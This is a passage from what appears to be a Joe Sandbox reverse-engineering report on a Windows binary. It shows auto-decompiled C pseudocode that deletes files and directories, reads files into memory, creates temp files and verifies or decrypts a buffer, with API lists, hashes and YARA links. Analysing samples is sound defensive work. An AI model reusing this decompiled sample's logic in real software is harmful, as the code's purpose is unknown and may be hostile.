								E005D7BE0(_t164 + 0x2fc, _t164 + 0x2fc, _t164 + 4, _t94);
								_t169 = _t164 + 0xc;
								E005D7C90( *((intOrPtr*)(_t169 + 4)),  *((intOrPtr*)(_t169 + 4)));
								_t164 = _t169 + 8;
							}
							goto L15;
						} else {
							_t124 = E005C97E0( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x48)) + 8)));
							_t135 = _t164 + 4;
							if(_t124 == 0) {
								L15:
								_t95 =  *_t164;
								if( *_t164 != 0) {
									_t98 = E005D6F80(_t95,  *(_t164 + 0xc), _t164 + 0xc, _t164 + 0x10);
									_t164 = _t164 + 0x10;
									if(_t98 != 0) {
										if( *0x5d9c04 == 0) {
											if(GetFileAttributesW(_t164 + 0xea) == 0xffffffff) {
												_t113 = _t164 + 0xea;
												_t157 = _t113;
												PathRemoveBackslashW(_t113);
												CreateDirectoryW(_t157, 0);
												PathAddBackslashW(_t157);
											}
											E005D7C90( *((intOrPtr*)(_t164 + 4)),  *((intOrPtr*)(_t164 + 4)));
											_t168 = _t164 + 8;
											E005C6270(_t168 + 0x2fc, _t168 + 0x2fc,  *((intOrPtr*)(_t168 + 4)),  *((intOrPtr*)(_t168 + 4)));
											_t164 = _t168 + 0xc;
										}
										_t102 = E005D4E70();
										_t143 =  *((intOrPtr*)(_t153 + 0x2c));
										 *((intOrPtr*)(_t143 + _t162 + 0xc)) = _t102;
										_t103 =  *(_t164 + 0x10);
										_t151 =  *((intOrPtr*)(_t164 + 8));
										_t164 = _t164 - 0x10;
										 *((intOrPtr*)(_t164 + 4)) =  *((intOrPtr*)(_t143 + _t162));
										 *(_t164 + 0xc) = _t103;
										 *((intOrPtr*)(_t164 + 8)) = _t151;
										E005CE0F0(_t153);
										_t105 =  *((intOrPtr*)(_t164 + 8));
										if( *((intOrPtr*)(_t164 + 8)) != 0) {
											E005C91E0(_t105);
											_t164 = _t164 + 4;
											 *((intOrPtr*)(_t164 + 8)) = 0;
											 *(_t164 + 0x10) = 0;
										}
									}
									_t99 =  *_t164;
									if( *_t164 != 0) {
										E005C91E0(_t99);
										_t164 = _t164 + 4;
										 *_t164 = 0;
										 *((intOrPtr*)(_t164 + 4)) = 0;
									}
								}
								goto L25;
							}
							_t125 =  *((intOrPtr*)(_t153 + 0x48));
							E005D5C00( *((intOrPtr*)(_t125 + 8)));
							if(_t125 == 0) {
								goto L25;
							} else {
								_t158 = 0;
								 *((intOrPtr*)(_t164 + 0x14)) = _t125;
								while(1) {
									_push(_t135);
									_push(_t164 + 4);
									_t127 = E005D4610( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x48)) + 8)), 5,  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x2c)) + _t162 + 4)));
									_t164 = _t164 + 0x14;
									if(_t127 != 0) {
										break;
									}
									Sleep(0xbb8);
									_t158 = _t158 + 1;
									if(_t158 < 2) {
										continue;
									}
									break;
								}
								E005C91E0( *((intOrPtr*)(_t164 + 0x14)));
								_t164 = _t164 + 4;
								goto L15;
							}
						}
						L25:
						_t131 =  *((intOrPtr*)(_t164 + 0x18)) + 1;
					} while (_t131 <  *((intOrPtr*)(_t153 + 0x24)));
					_t96 =  *_t164;
					if( *_t164 != 0) {
						E005C91E0(_t96);
						_t164 = _t164 + 4;
					}
					_t129 = 1;
				}
			}

0x005d502a
0x005d502c
0x005d5032
0x005d5036
0x005d5039
0x005d503d
0x005d5041
0x005d5046
0x005d504d
0x005d5052
0x005d5055
0x005d506c
0x005d52ef
0x005d52ef
0x005d52f5
0x005d52f8
0x005d52fd
0x005d52fd
0x005d5304
0x005d5315
0x005d5315
0x005d5075
0x005d507a
0x005d5084
0x005d508f
0x005d5094
0x005d5099
0x005d509e
0x005d50a4
0x005d50a6
0x005d50a8
0x005d50b2
0x005d50b7
0x005d50bc
0x005d50c2
0x005d50c6
0x005d50c9
0x005d50e2
0x005d50e7
0x005d50ec
0x005d50f7
0x005d50fc
0x005d5101
0x005d5103
0x005d5103
0x005d510b
0x005d5113
0x005d5120
0x005d51b3
0x005d51b7
0x005d51c7
0x005d51cc
0x005d51d7
0x005d51dc
0x005d51dc
0x00000000
0x005d513b
0x005d5141
0x005d5148
0x005d514c
0x005d51df
0x005d51df
0x005d51e4
0x005d51f9
0x005d51fe
0x005d5203
0x005d5210
0x005d5223
0x005d5225
0x005d522c
0x005d522f
0x005d5238
0x005d523f
0x005d523f
0x005d524d
0x005d5252
0x005d5265
0x005d526a
0x005d526a
0x005d526d
0x005d5272
0x005d5275
0x005d5279
0x005d527d
0x005d5284
0x005d5287
0x005d528d
0x005d5291
0x005d5295
0x005d529a
0x005d52a0
0x005d52a3
0x005d52a8
0x005d52ad
0x005d52b1
0x005d52b1
0x005d52a0
0x005d52b5
0x005d52ba
0x005d52bd
0x005d52c2
0x005d52c7
0x005d52ca
0x005d52ca
0x005d52ba
0x00000000
0x005d51e4
0x005d5152
0x005d5158
0x005d515f
0x00000000
0x005d5165
0x005d5165
0x005d5167
0x005d516b
0x005d5171
0x005d5176
0x005d5180
0x005d5185
0x005d518a
0x00000000
0x00000000
0x005d5191
0x005d5197
0x005d519b
0x00000000
0x00000000
0x00000000
0x005d519b
0x005d51a1
0x005d51a6
0x00000000
0x005d51a6
0x005d515f
0x005d52ce
0x005d52d2
0x005d52d3
0x005d52dc
0x005d52e1
0x005d52e4
0x005d52e9
0x005d52e9
0x005d52ee
0x005d52ee

APIs

GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 005D5064

Part of subcall function 005D68E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000400), ref: 005D6A15

Part of subcall function 005D0230: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005D0248
Part of subcall function 005D0230: GetFileTime.KERNEL32(00000000,?,?,?,?,?,005D0385,00000000), ref: 005D0267
Part of subcall function 005D0230: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 005D028C
Part of subcall function 005D0230: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 005D02B0
Part of subcall function 005D0230: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 005D02D3
Part of subcall function 005D0230: CloseHandle.KERNEL32(00000000), ref: 005D02E5

Sleep.KERNEL32(00000BB8), ref: 005D5191
GetFileAttributesW.KERNEL32(?), ref: 005D521A
PathRemoveBackslashW.SHLWAPI(?), ref: 005D522F
CreateDirectoryW.KERNEL32(?,00000000), ref: 005D5238
PathAddBackslashW.SHLWAPI(?), ref: 005D523F

Part of subcall function 005D7BE0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 005D7C03
Part of subcall function 005D7BE0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?), ref: 005D7C1D
Part of subcall function 005D7BE0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 005D7C28
Part of subcall function 005D7BE0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005D7C4A
Part of subcall function 005D7BE0: CloseHandle.KERNEL32(00000000), ref: 005D7C6D

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: File$CreatePath_aulldiv$BackslashCloseHandlePointer$AttributesByteCharDirectoryFullMultiNameReadRemoveSleepTimeWide
String ID:
API String ID: 2481069558-0
Opcode ID: 898f9c1539e55fbf8873735831ab9f8461fd0a9ac28df3ea61c77c67b3c90b6d
Instruction ID: bda982c0fe9740e6544596f1cb5013bc5b82ef0d03c8a2299b53d5a8cd2e092c
Opcode Fuzzy Hash: 898f9c1539e55fbf8873735831ab9f8461fd0a9ac28df3ea61c77c67b3c90b6d
Instruction Fuzzy Hash: 7F817175904706AFC720EF68D889A5BBBE8BF94304F04482FF989C6252F731E904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 005CD6B0, Relevance: 9.2, APIs: 6, Instructions: 161
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E005CD6B0(signed int* __ecx) {
				signed int _t38;
				signed int _t41;
				signed int _t43;
				signed int _t47;
				WCHAR* _t48;
				signed int _t53;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int _t82;
				signed int* _t83;
				signed int* _t84;
				signed int _t85;
				signed int _t88;
				WCHAR* _t89;
				void* _t91;
				signed int* _t92;
				signed int _t93;
				signed int** _t94;
				signed int** _t97;
				signed int** _t98;
				signed int** _t99;

				_t92 = _t94[0x1c3];
				_t84 = __ecx;
				if(_t92 != 0) {
					 *0x5d9d54(0x5d9bbc);
				}
				_t38 =  *_t84;
				if(_t38 == 0) {
					L6:
					_t85 = 0;
				} else {
					_t74 = _t94[0x1c4];
					_t82 = _t94[0x1c2];
					_t80 = _t84[1];
					_t71 = 0;
					 *_t94 = _t84;
					while( *((intOrPtr*)(_t80 + _t71 * 4)) != _t82) {
						_t71 = _t71 + 1;
						if(_t71 < _t38) {
							continue;
						} else {
							goto L6;
						}
						goto L28;
					}
					__eflags = _t74;
					if(_t74 == 0) {
						L18:
						__eflags = _t82;
						if(_t82 != 0) {
							goto L19;
						}
					} else {
						_t78 =  *0x5d9c04; // 0x0
						__eflags = _t78;
						if(_t78 != 0) {
							goto L18;
						} else {
							_push( *((intOrPtr*)(_t82 + 8)));
							_t47 = E005CC720();
							__eflags = _t47;
							if(__eflags != 0) {
								_t88 = _t47;
								_t48 = E005D0520(__eflags, _t47);
								__eflags = _t48;
								if(_t48 != 0) {
									_t94[2] = _t88;
									_t94[1] = _t48;
									DeleteFileW(_t48);
									_t89 =  &(_t94[3]);
									E005D4520(_t89, 0x50);
									_t97 =  &(_t94[2]);
									_t53 = GetFullPathNameW(_t89, 0x105,  &(_t97[0x13a]), 0);
									__eflags = _t53;
									if(_t53 != 0) {
										E005D4520( &(_t97[4]), 0x51);
										_t98 =  &(_t97[2]);
										_push( *((intOrPtr*)(_t82 + 8)));
										E005D68E0( &(_t98[0x35]), 0x105,  &(_t97[4]),  &(_t98[0x13b]));
										_t97 =  &(_t98[5]);
										__eflags =  *(_t82 + 0x24);
										if( *(_t82 + 0x24) > 0) {
											_t93 = 0;
											__eflags = 0;
											_t91 = 4;
											do {
												E005D4520( &(_t97[4]), 0x23);
												_t99 =  &(_t97[2]);
												_push( *((intOrPtr*)( *((intOrPtr*)(_t82 + 0x2c)) + _t91)));
												E005D68E0( &(_t99[0xbc]), 0x105,  &(_t99[5]),  &(_t99[0x36]));
												_t97 =  &(_t99[5]);
												DeleteFileW( &(_t97[0xb8]));
												_t93 = _t93 + 1;
												_t91 = _t91 + 0x10;
												__eflags = _t93 -  *(_t82 + 0x24);
											} while (_t93 <  *(_t82 + 0x24));
										}
										RemoveDirectoryW( &(_t97[0x35]));
										_t92 = _t97[0x1c3];
									}
									E005C91E0(_t97[1]);
									_t94 =  &(_t97[1]);
									_t88 = _t94[2];
								}
								E005C91E0(_t88);
								_t94 =  &(_t94[1]);
							}
							L19:
							E005CB860(_t82);
							L005D7400(_t82);
							_t94 =  &(_t94[1]);
							_t38 =  *( *_t94);
						}
					}
					_t83 =  *_t94;
					_t75 = _t38 - 1;
					__eflags = _t71 - _t75;
					 *_t83 = _t75;
					if(_t71 < _t75) {
						_t72 = _t71 + 1;
						__eflags = _t72;
						do {
							 *((intOrPtr*)(_t83[1] + _t72 * 4 - 4)) =  *((intOrPtr*)(_t83[1] + _t72 * 4));
							_t72 = _t72 + 1;
							__eflags = _t38 - _t72;
						} while (_t38 != _t72);
					}
					_t41 = _t83[1];
					__eflags = _t75;
					if(_t75 == 0) {
						E005C91E0(_t41);
						_t43 = 0;
						__eflags = 0;
						goto L27;
					} else {
						_t43 = E005C3180(_t75 << 2, _t41);
						__eflags = _t43;
						if(_t43 != 0) {
							L27:
							_t83[1] = _t43;
							_t85 = 1;
							__eflags = 1;
						} else {
							goto L6;
						}
					}
				}
				L28:
				if(_t92 != 0) {
					 *0x5d9d9c(0x5d9bbc);
				}
				return _t85;
			}

0x005cd6ba
0x005cd6c1
0x005cd6c5
0x005cd6cc
0x005cd6cc
0x005cd6d2
0x005cd6d6
0x005cd6f8
0x005cd6f8
0x005cd6d8
0x005cd6d8
0x005cd6df
0x005cd6e6
0x005cd6e9
0x005cd6eb
0x005cd6ee
0x005cd6f3
0x005cd6f6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x005cd6f6
0x005cd6ff
0x005cd701
0x005cd82e
0x005cd82e
0x005cd830
0x00000000
0x00000000
0x005cd707
0x005cd707
0x005cd70d
0x005cd70f
0x00000000
0x005cd715
0x005cd715
0x005cd718
0x005cd71d
0x005cd71f
0x005cd725
0x005cd728
0x005cd72d
0x005cd72f
0x005cd735
0x005cd739
0x005cd73e
0x005cd744
0x005cd74b
0x005cd750
0x005cd763
0x005cd769
0x005cd76b
0x005cd77a
0x005cd77f
0x005cd789
0x005cd79b
0x005cd7a0
0x005cd7a3
0x005cd7a7
0x005cd7a9
0x005cd7a9
0x005cd7ab
0x005cd7b0
0x005cd7b7
0x005cd7bc
0x005cd7c2
0x005cd7df
0x005cd7e4
0x005cd7ef
0x005cd7f5
0x005cd7f6
0x005cd7f9
0x005cd7f9
0x005cd7b0
0x005cd806
0x005cd80c
0x005cd80c
0x005cd817
0x005cd81c
0x005cd81f
0x005cd81f
0x005cd824
0x005cd829
0x005cd829
0x005cd832
0x005cd834
0x005cd83a
0x005cd83f
0x005cd845
0x005cd845
0x005cd70f
0x005cd847
0x005cd84a
0x005cd84d
0x005cd84f
0x005cd851
0x005cd853
0x005cd853
0x005cd854
0x005cd85a
0x005cd85e
0x005cd85f
0x005cd85f
0x005cd854
0x005cd863
0x005cd866
0x005cd868
0x005cd881
0x005cd889
0x005cd889
0x00000000
0x005cd86a
0x005cd86f
0x005cd877
0x005cd879
0x005cd88b
0x005cd88d
0x005cd890
0x005cd890
0x005cd87b
0x00000000
0x005cd87b
0x005cd879
0x005cd868
0x005cd891
0x005cd893
0x005cd89a
0x005cd89a
0x005cd8ac

APIs

RtlEnterCriticalSection.NTDLL(005D9BBC), ref: 005CD6CC
DeleteFileW.KERNEL32(00000000,00000000,?), ref: 005CD73E
GetFullPathNameW.KERNEL32(?,00000105,?,00000000), ref: 005CD763
DeleteFileW.KERNEL32(?), ref: 005CD7EF
RemoveDirectoryW.KERNEL32(?), ref: 005CD806
RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005CD89A

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CriticalDeleteFileSection$DirectoryEnterFullLeaveNamePathRemove
String ID:
API String ID: 328185309-0
Opcode ID: 60c6970e1fa16f380628a09a96f2bb163b5e32265d88ab89b52fd0323a7b3574
Instruction ID: c50f59534ed9d263c7a05284b2f034168fbcb8406cabe84c68319a966cf054f5
Opcode Fuzzy Hash: 60c6970e1fa16f380628a09a96f2bb163b5e32265d88ab89b52fd0323a7b3574
Instruction Fuzzy Hash: 5951A3B5904206AFD730ABA4DC49F6BBBA8FF84704F04053EE949D3241E771E915CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 005D7410, Relevance: 9.1, APIs: 6, Instructions: 108
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E005D7410(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v1040;
				struct _OVERLAPPED* _v1044;
				intOrPtr _t25;
				void* _t27;
				long _t29;
				void* _t34;
				long _t41;
				intOrPtr _t42;
				short* _t43;
				void* _t44;
				void* _t45;
				signed int _t46;
				signed int _t47;
				void* _t49;
				signed int _t50;
				signed int _t51;
				void* _t52;
				intOrPtr _t53;
				void* _t54;
				DWORD* _t55;

				_t53 = _a12;
				_t25 = _a8;
				_t42 = _a4;
				_t44 = 0xfffffc00;
				_v1044 = 0;
				while(1) {
					_t50 =  *(_t42 + _t44 + 0x400) & 0x0000ffff;
					if(_t50 == 0) {
						break;
					}
					 *(_t54 + _t44 + 0x404) = _t50;
					_t44 = _t44 + 2;
					if(_t44 != 0) {
						continue;
					} else {
						 *((short*)(_t54 + _t44 + 0x402)) = 0;
					}
					L20:
					return 0;
				}
				 *(_t54 + _t44 + 0x404) = 0;
				_t43 =  &_v1040;
				_t45 = 0x200;
				while( *_t43 != 0) {
					_t43 = _t43 + 2;
					_t45 = _t45 - 1;
					if(_t45 != 0) {
						continue;
					} else {
					}
					goto L20;
				}
				_t46 = 0;
				while(1) {
					_t51 = _t46;
					_t47 =  *(_t25 + _t46 * 2) & 0x0000ffff;
					if(_t47 == 0) {
						break;
					}
					 *(_t43 + _t51 * 2) = _t47;
					_t17 = _t51 + 1; // 0x1
					_t46 = _t17;
					if(_t45 != _t46) {
						continue;
					} else {
						 *(_t43 + _t51 * 2) = 0;
					}
					goto L20;
				}
				 *(_t43 + _t51 * 2) = 0;
				_t27 = CreateFileW( &_v1040, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t27 != 0xffffffff) {
					_t52 = _t27;
					_t29 = SetFilePointer(_t27, 0, 0, 2);
					if(_t29 == 0xffffffff) {
						L19:
						CloseHandle(_t52);
					} else {
						_t41 = _t29;
						SetFilePointer(_t52, 0, 0, 0);
						_t23 = _t41 - 1; // -1
						if(_t23 > 0x4ffffe) {
							goto L19;
						} else {
							_t34 = E005C3180(_t41, 0);
							_t55 = _t54 + 8;
							if(_t34 == 0) {
								goto L19;
							} else {
								_t49 = _t34;
								if(ReadFile(_t52, _t49, _t41, _t55, 0) == 0) {
									E005C91E0(_t49);
									goto L19;
								} else {
									CloseHandle(_t52);
									_push(_t53);
									_push(_v1044);
									_push(_t49);
									E005D1240();
									E005C91E0(_t49);
								}
							}
						}
					}
				}
				goto L20;
			}

0x005d741a
0x005d7421
0x005d7428
0x005d742f
0x005d7434
0x005d743b
0x005d743b
0x005d7446
0x00000000
0x00000000
0x005d7448
0x005d7450
0x005d7453
0x00000000
0x005d7455
0x005d7455
0x005d7455
0x005d7550
0x005d755c
0x005d755c
0x005d7464
0x005d746e
0x005d7472
0x005d7477
0x005d747d
0x005d7480
0x005d7481
0x00000000
0x00000000
0x005d7483
0x00000000
0x005d7481
0x005d7488
0x005d748a
0x005d748a
0x005d748c
0x005d7493
0x00000000
0x00000000
0x005d7495
0x005d7499
0x005d7499
0x005d749e
0x00000000
0x005d74a0
0x005d74a0
0x005d74a0
0x00000000
0x005d749e
0x005d74b1
0x005d74c8
0x005d74d1
0x005d74d3
0x005d74da
0x005d74e3
0x005d7549
0x005d754a
0x005d74e5
0x005d74e5
0x005d74ed
0x005d74f3
0x005d74fb
0x00000000
0x005d74fd
0x005d7500
0x005d7505
0x005d750a
0x00000000
0x005d750c
0x005d750c
0x005d751e
0x005d7541
0x00000000
0x005d7520
0x005d7521
0x005d7527
0x005d7528
0x005d752c
0x005d752d
0x005d7536
0x005d753b
0x005d751e
0x005d750a
0x005d74fb
0x005d74e3
0x00000000

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 005D74C8
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005D74DA
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005D74ED
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005D7516
CloseHandle.KERNEL32(00000000), ref: 005D7521

Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1

CloseHandle.KERNEL32(00000000), ref: 005D754A

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: File$CloseHandlePointer$CreateFreeHeapRead
String ID:
API String ID: 3957287750-0
Opcode ID: 213d562a62b219a09dc68f31557703bd2f2d135aa6d80a07ddeb90e056f26305
Instruction ID: 173480b742ab2c3312e1b582de24a0f4df019e8be2bfc6da046fa7b0f942d515
Opcode Fuzzy Hash: 213d562a62b219a09dc68f31557703bd2f2d135aa6d80a07ddeb90e056f26305
Instruction Fuzzy Hash: FA3104B1108204A7D7305B28EC49FAB7AADFFC5718F64462BF64996391F7318D06C2A6

Uniqueness

Uniqueness Score: -1.00%

Function 005CFA90, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 329
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E005CFA90(short* __ecx, void* __eflags, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16) {
				WCHAR* _v0;
				WCHAR* _v8;
				char _v220;
				int _v224;
				short _v228;
				WCHAR* _v236;
				char _v240;
				signed int _v244;
				WCHAR* _v248;
				intOrPtr _v252;
				WCHAR* _v256;
				short _v260;
				char _v264;
				short* _v268;
				short* _v272;
				short* _v276;
				short* _v280;
				WCHAR* _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _t107;
				WCHAR* _t108;
				WCHAR* _t116;
				WCHAR* _t123;
				WCHAR* _t124;
				intOrPtr _t125;
				WCHAR* _t127;
				intOrPtr _t128;
				WCHAR* _t131;
				intOrPtr _t132;
				WCHAR* _t134;
				intOrPtr _t135;
				WCHAR* _t136;
				intOrPtr _t137;
				WCHAR* _t140;
				WCHAR* _t141;
				intOrPtr _t142;
				WCHAR* _t147;
				WCHAR* _t149;
				signed int _t152;
				intOrPtr _t154;
				signed int _t155;
				signed int _t159;
				WCHAR* _t163;
				WCHAR* _t164;
				WCHAR* _t165;
				WCHAR* _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				signed int _t170;
				short* _t172;
				char* _t173;
				WCHAR* _t174;
				signed int _t178;
				intOrPtr _t181;
				signed int _t182;
				short* _t184;
				WCHAR* _t186;
				WCHAR* _t187;
				short* _t189;
				intOrPtr _t190;
				WCHAR* _t194;
				WCHAR* _t195;
				signed int _t196;
				short** _t200;

				_t195 = _a8;
				_t189 = __ecx;
				E005D6610( &_v284, 0, 0x10c);
				_t200 =  &(( &_v280)[3]);
				_t107 =  *0x5d9b0c; // 0x26f2b8
				 *(_t107 + 8) = 6;
				_t4 = _t107 + 0x24; // 0x0
				_t168 =  *_t4;
				if(_t168 == 0) {
					L32:
					 *(_t107 + 8) = 2;
					goto L33;
				} else {
					_t152 = 0xfffffffe;
					_t149 = 1;
					while( *((short*)(_t168 + _t149 * 2 - 2)) != 0) {
						_t149 =  &(_t149[0]);
						_t152 = _t152 + 0xfffffffe;
						if(_t149 != 0x80000000) {
							continue;
						} else {
							_v252 = 0;
							_v248 = 0x80070057;
							goto L32;
						}
					}
					_t10 = _t149 - 1; // 0x0
					_t181 = _t10;
					_v252 = _t181;
					_v248 = 0;
					_t123 = E005C3180( ~_t152, 0);
					_t200 =  &(_t200[2]);
					_t169 =  *0x5d9b0c; // 0x26f2b8
					__eflags = _t123;
					_v284 = _t123;
					if(_t123 == 0) {
						 *(_t169 + 8) = 6;
						L33:
						if(_v220 == 0) {
							_t108 = _v256;
							__eflags = _t108;
							if(_t108 != 0) {
								E005C91E0(_t108);
								_t200 =  &(_t200[1]);
							}
							__eflags = _t195;
							if(_t195 != 0) {
								_t116 = _v0;
								__eflags = _t116;
								if(_t116 != 0) {
									DeleteFileW(_t116);
									E005C91E0(_v0);
									_t200 =  &(_t200[1]);
									_v0 = 0;
								}
							}
						} else {
							if(_t195 != 0) {
								_t120 = _v256;
								if(_v256 != 0) {
									E005C91E0(_t120);
									_t200 =  &(_t200[1]);
								}
							}
						}
						_t109 = _v260;
						if(_v260 != 0) {
							E005C91E0(_t109);
							_t200 =  &(_t200[1]);
						}
						_t110 = _v284;
						if(_v284 != 0) {
							E005C91E0(_t110);
							_t200 =  &(_t200[1]);
						}
						_t111 = _v276;
						if(_v276 != 0) {
							E005C91E0(_t111);
						}
						return _v220;
					}
					__eflags = _t149;
					if(__eflags <= 0) {
						_t154 = 0x80070057;
						if(__eflags != 0) {
							 *_t123 = 0;
						}
						L16:
						_v248 = _t154;
						 *(_t169 + 8) = 2;
						goto L33;
					} else {
						 *_t200 = _t189;
						_t14 = _t169 + 0x24; // 0x0
						_t190 =  *_t14;
						_v288 = _t181;
						_v292 = _t169;
						_t182 = 2;
						_t170 = 0;
						_t155 = 0;
						__eflags = 0;
						while(1) {
							_t196 =  *(_t190 + _t155 * 2) & 0x0000ffff;
							__eflags = _t196;
							if(_t196 == 0) {
								break;
							}
							_t123[_t155] = _t196;
							_t182 = _t182 + 0xfffffffe;
							_t170 = _t170 + 0xfffffffe;
							__eflags = _t149 - 1;
							_t149 = _t149 - 1;
							if(__eflags == 0) {
								L11:
								__eflags = _t149;
								_t180 =  ==  ?  ~_t182 :  ~_t170;
								 *((short*)(_t123 + ( ==  ?  ~_t182 :  ~_t170))) = 0;
								if(_t149 != 0) {
									L18:
									 *((intOrPtr*)( &_v240 - 8)) = 0;
									_t184 =  &(( *_t200)[6]);
									_t124 = E005D08A0(_t123, _t123, _v288,  &_v276,  &_v240);
									_t195 = _v8;
									__eflags = _t124;
									if(_t124 == 0) {
										L31:
										_t107 =  *0x5d9b0c; // 0x26f2b8
										goto L32;
									}
									_t125 = _v240;
									__eflags = _t125 - 0x23;
									if(_t125 <= 0x23) {
										goto L31;
									}
									_t172 = _v276;
									 *_t200 = _t184;
									_v228 =  *_t172;
									_v268 =  &(_t172[2]);
									_t159 = _t172[0x12];
									_v244 = _t159;
									_v280 =  &(_t172[0x14]);
									_t193 = _t172 + 0x28 + _t159 * 2;
									_t186 = _t125 - 0x28 - _t159 + _t159;
									__eflags = _t159;
									_v264 = _t172 + 0x28 + _t159 * 2;
									_v236 = _t186;
									_v272 = _t172;
									if(_t159 == 0) {
										goto L31;
									}
									__eflags = _t186;
									if(_t186 == 0) {
										goto L31;
									}
									_push(_t186);
									_t127 = E005CB250(_t172, _t125 - _t186, _t193);
									__eflags = _t127;
									if(_t127 == 0) {
										_t128 =  *0x5d9b0c; // 0x26f2b8
										 *((intOrPtr*)(_t128 + 8)) = 3;
										goto L33;
									}
									_t187 = _a12;
									__eflags = _t195;
									 *_v268 = 0;
									if(__eflags == 0) {
										L66:
										_push(0xc);
										_push( &_v228);
										_t131 = E005CDCF0(__eflags,  *((intOrPtr*)( &_v260 - 0x18)),  &_v260);
										_t200 =  &(_t200[4]);
										__eflags = _t131;
										if(_t131 == 0) {
											_t132 =  *0x5d9b0c; // 0x26f2b8
											 *((intOrPtr*)(_t132 + 8)) = 4;
											goto L33;
										}
										_t173 =  &_v264;
										_push(0x800c);
										_push( &_v236);
										_push(_t173);
										_push( *((intOrPtr*)(_t173 + 0x24)));
										_push( *((intOrPtr*)(_t173 + 4)));
										_t134 = E005CF800();
										__eflags = _t134;
										if(_t134 == 0) {
											L70:
											_t135 =  *0x5d9b0c; // 0x26f2b8
											 *((intOrPtr*)(_t135 + 8)) = 5;
											goto L33;
										}
										__eflags = _v236 - 0x20;
										if(_v236 != 0x20) {
											goto L70;
										}
										_t136 = E005D7D20(_v264, _v272, 0x20);
										_t200 =  &(_t200[3]);
										__eflags = _t136;
										if(_t136 == 0) {
											__eflags = _t195;
											if(_t195 == 0) {
												_t163 = _a8;
												__eflags = _t163;
												if(_t163 == 0) {
													L79:
													__eflags = _v224;
													if(_v224 != 0) {
														_t137 =  *0x5d9b0c; // 0x26f2b8
														 *(_t137 + 8) = 1;
													}
													goto L33;
												}
												__eflags = _t187;
												 *_t163 = _v260;
												if(_t187 == 0) {
													goto L79;
												}
												 *_t187 = _v228;
												L78:
												_v224 = 1;
												goto L79;
											}
											_t140 = E005C6270(_t136, _v0, _v260, _v228);
											_t200 =  &(_t200[3]);
											__eflags = _t140;
											if(_t140 != 0) {
												goto L78;
											}
											goto L33;
										}
										goto L70;
									}
									_t141 = E005C3180(0x20a, 0);
									_t200 =  &(_t200[2]);
									__eflags = _t141;
									_v0 = _t141;
									if(_t141 == 0) {
										_t142 =  *0x5d9b0c; // 0x26f2b8
										 *(_t142 + 8) = 6;
										goto L33;
									}
									__eflags = _v0;
									if(_v0 == 0) {
										L30:
										GetTempPathW(0x104, _t141);
										_t194 =  &_v220;
										E005D4520(_t194, 0x7c);
										_t200 =  &(_t200[2]);
										GetTempFileNameW(_v0, _t194, 1, _v0);
										_t141 = _v0;
										L52:
										_t174 = 0;
										__eflags = 0;
										_t164 = _t141;
										while(1) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												break;
											}
											_t174 = _t174 + 1;
											_t164 =  &(_t164[1]);
											__eflags = _t174 - 0x103;
											if(_t174 <= 0x103) {
												continue;
											}
											break;
										}
										__eflags = _t164 - _t141;
										if(__eflags <= 0) {
											goto L66;
										}
										_t165 =  &(_t164[2]);
										__eflags = _t165;
										while(1) {
											__eflags = ( *(_t165 - 4) & 0x0000ffff) - 0x2e;
